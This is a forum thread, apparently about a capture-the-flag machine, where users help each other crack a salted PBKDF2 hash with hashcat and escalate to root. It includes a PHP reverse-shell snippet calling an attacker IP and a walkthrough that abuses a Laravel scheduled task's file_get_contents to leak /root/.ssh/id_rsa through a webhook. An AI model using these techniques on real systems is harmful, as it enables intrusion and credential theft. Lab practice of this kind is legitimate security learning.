Return to forum

hackthebaaax · August 21, 2022 at 9:10 PM

someone help me to break the hash?, I have the passwd and salt but I can't break it maybe my format is wrong

orwell1984 · August 21, 2022 at 9:10 PM

(August 21, 2022, 08:51 PM)echo133t Wrote: I found that root is running
/bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1
if we could add this to the file artisan ... but the owner is www-data
$sock=fsockopen("10.10.14.xx", 443);
exec("/bin/sh -i <&3 >&3 2>&3");
I haven't found anything else yet

There's another thing that root runs every once in a while that has to do with the first vulnerability

lollole · August 21, 2022 at 9:13 PM

(August 21, 2022, 07:21 PM)orwell1984 Wrote:
(August 21, 2022, 06:49 PM)echo133t Wrote:
(August 21, 2022, 05:13 PM)orwell1984 Wrote: Yeah, you need a salt, you can get it the same way you got the password. Then you have to format it right to be able to crack it with hashcat.

Hell, i'm using this:
hashcat -m 10900 --force hash.txt rockyou.txt
hash.txt format:
sha256:10000:<Base64(salt)>:<Base64(passwd)>
password format:
perl -e 'print pack ("H*","password here")' | base64
salt format:
echo user_salt | base64
and I didn't find anything in rockyou.txt, my hash has the wrong format?.
That looks good to me...
Send me a DM with the salt and the password to check if everything is ok

Same cant crack hash w this format

orwell1984 · August 21, 2022 at 9:21 PM

(August 21, 2022, 09:13 PM)lollole Wrote:
(August 21, 2022, 07:21 PM)orwell1984 Wrote:
(August 21, 2022, 06:49 PM)echo133t Wrote:
(August 21, 2022, 05:13 PM)orwell1984 Wrote: Yeah, you need a salt, you can get it the same way you got the password. Then you have to format it right to be able to crack it with hashcat.

Hell, i'm using this:
hashcat -m 10900 --force hash.txt rockyou.txt
hash.txt format:
sha256:10000:<Base64(salt)>:<Base64(passwd)>
password format:
perl -e 'print pack ("H*","password here")' | base64
salt format:
echo user_salt | base64
and I didn't find anything in rockyou.txt, my hash has the wrong format?.
That looks good to me...
Send me a DM with the salt and the password to check if everything is ok
Same cant crack hash w this format

Open private, let me check if everything is ok.

lollole · August 21, 2022 at 9:38 PM

(August 21, 2022, 09:21 PM)orwell1984 Wrote:
(August 21, 2022, 09:13 PM)lollole Wrote:
(August 21, 2022, 07:21 PM)orwell1984 Wrote:
(August 21, 2022, 06:49 PM)echo133t Wrote:
(August 21, 2022, 05:13 PM)orwell1984 Wrote: Yeah, you need a salt, you can get it the same way you got the password. Then you have to format it right to be able to crack it with hashcat.

Hell, i'm using this:
hashcat -m 10900 --force hash.txt rockyou.txt
hash.txt format:
sha256:10000:<Base64(salt)>:<Base64(passwd)>
password format:
perl -e 'print pack ("H*","password here")' | base64
salt format:
echo user_salt | base64
and I didn't find anything in rockyou.txt, my hash has the wrong format?.
That looks good to me...
Send me a DM with the salt and the password to check if everything is ok
Same cant crack hash w this format
Open private, let me check if everything is ok.

Fixed it, trying to find root part but no clue...

orwell1984 · August 21, 2022 at 9:40 PM

(August 21, 2022, 09:38 PM)lollole Wrote:
(August 21, 2022, 09:21 PM)orwell1984 Wrote:
(August 21, 2022, 09:13 PM)lollole Wrote:
(August 21, 2022, 07:21 PM)orwell1984 Wrote:
(August 21, 2022, 06:49 PM)echo133t Wrote: Hell, i'm using this:
hashcat -m 10900 --force hash.txt rockyou.txt
hash.txt format:
sha256:10000:<Base64(salt)>:<Base64(passwd)>
password format:
perl -e 'print pack ("H*","password here")' | base64
salt format:
echo user_salt | base64
and I didn't find anything in rockyou.txt, my hash has the wrong format?.
That looks good to me...
Send me a DM with the salt and the password to check if everything is ok
Same cant crack hash w this format
Open private, let me check if everything is ok.
Fixed it, trying to find root part but no clue...

For privesc use pspy

lollole · August 21, 2022 at 9:51 PM

(August 21, 2022, 09:40 PM)orwell1984 Wrote:
(August 21, 2022, 09:38 PM)lollole Wrote:
(August 21, 2022, 09:21 PM)orwell1984 Wrote:
(August 21, 2022, 09:13 PM)lollole Wrote:
(August 21, 2022, 07:21 PM)orwell1984 Wrote: That looks good to me...
Send me a DM with the salt and the password to check if everything is ok

Same cant crack hash w this format

Open private, let me check if everything is ok.

Fixed it, trying to find root part but no clue...

For privesc use pspy

ofc I already used that but still cant find anything could u pm?

xigncode7 · August 21, 2022 at 10:13 PM

still no clue, how can u find it ?

August 21, 2022 at 10:20 PM

For the root part:

With pspy you will see that it runs the laravel scheduled tasks as root and clears the tasks table every minute:

    /bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1
    mysql laravel --execute TRUNCATE tasks

First get the mysql creds from env and log in to the db.

Checking the app/Console/Kernel.php you will see that it runs the HealthChecker::check function from app/Http/Controllers/HealthChecker.php on the tasks from db.

And in that function we can abuse the "$res = @file_get_contents($monitoredUrl, false)" to read files.

So, from the webapp just create a task.

From the database change the monitoredUrl to any file you want to read like:

    update tasks set monitoredUrl='file:///root/.ssh/id_rsa';

And on the weebhookUrl, you will get the contents of the file.

Note: If you are getting the id_rsa don't forget to correctly get rid of the backslashes.

NoobHTB · August 22, 2022 at 3:34 AM

(August 21, 2022, 09:10 PM)hackthebaaax Wrote: someone help me to break the hash?, I have the passwd and salt but I can't break it maybe my format is wrong

Have you cracked the hash?